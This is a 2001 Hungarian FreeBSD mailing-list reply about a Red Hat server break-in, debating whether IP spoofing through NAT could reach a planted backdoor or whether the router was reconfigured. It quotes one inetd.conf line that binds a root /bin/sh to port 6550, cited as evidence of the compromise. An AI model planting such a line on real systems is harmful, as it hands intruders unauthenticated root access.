[FreeBSD] Fwd: Red Hat compromise
Gabor Zahemszky
ZGabor at CoDe.hu
2001. Május. 17., Cs, 16:16:23 CEST
On Thu, May 17, 2001 at 11:45:23AM +0200, Adam Szilveszter wrote:
> > > 6550 stream tcp nowait root /bin/sh sh -i
> > > which provides a nice back door and indicates perpetrator had root access.
> >
> > namarmost: ha a 6550 kivulrol nem tud bejonni, akkor vagy a routert is
> > atkonfigtak, vagy belulrol jottek
> > vagy nem volt NAT-olos router a szerver elott
> > vagy en tok rosszul tudom, es valahogy be lehet menni NAT moge, akkor
> > viszont valaki vilagositson mar fel...
>
> Ha csak NAT-olsz es nem hasznalsz megfelelo tuzfal szabalyokat hozza,
> akkor pl igy: valaki megtudja, hogy te milyen IP address tartomanyt
> hasznalsz a NAT mogott (nem nehez, a legtobben csak masoljak a doksikat,
> ugyhogy azt a nehany rezervalt tartomanyt kell kiprobalni) es ezutan egy
> olyan csomagot "fabrikalsz" amelyik azt allitja, hogy o a te LAN-odrol
> jott. A NAT ezzel nem csinal semmit, ha nincs olyan tuzfal rule, hogy kulso
Hé!
Valaki azt is magyarazza mar meg, hogy ez az igen ugyes trukk hogyan fogja
nekem azt is megtenni, hogy az a k* interaktiv shell amit _VALASZOL_, az
viszont hozzam jojjon, ne pedig bent bolyongjon. Szoval en a druszaval
tartok, hogy ott meghagtak a routert is! Mert attol, hogy en a Te cimedet
hasznalom, attol Te meg nem nekem fogsz valaszolni, hanem annak, aki
valojaban azon a cimen el. Szoval valoban jo az ingress/egress filtering,
de a nelkul se trivialis ez a dolog igy. OKOSOK! Mongyatok ma valamit!
> Na talan majd a mai nap folyaman megtudjuk a tobbit, az amik meg
> alszanak:-)
Lecci legalabb engem ertesits, most nem erek ra azokra a listakra ... :-(
ZGabor at CoDe dot HU
--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"
További információk a(z) BSD levelezőlistáról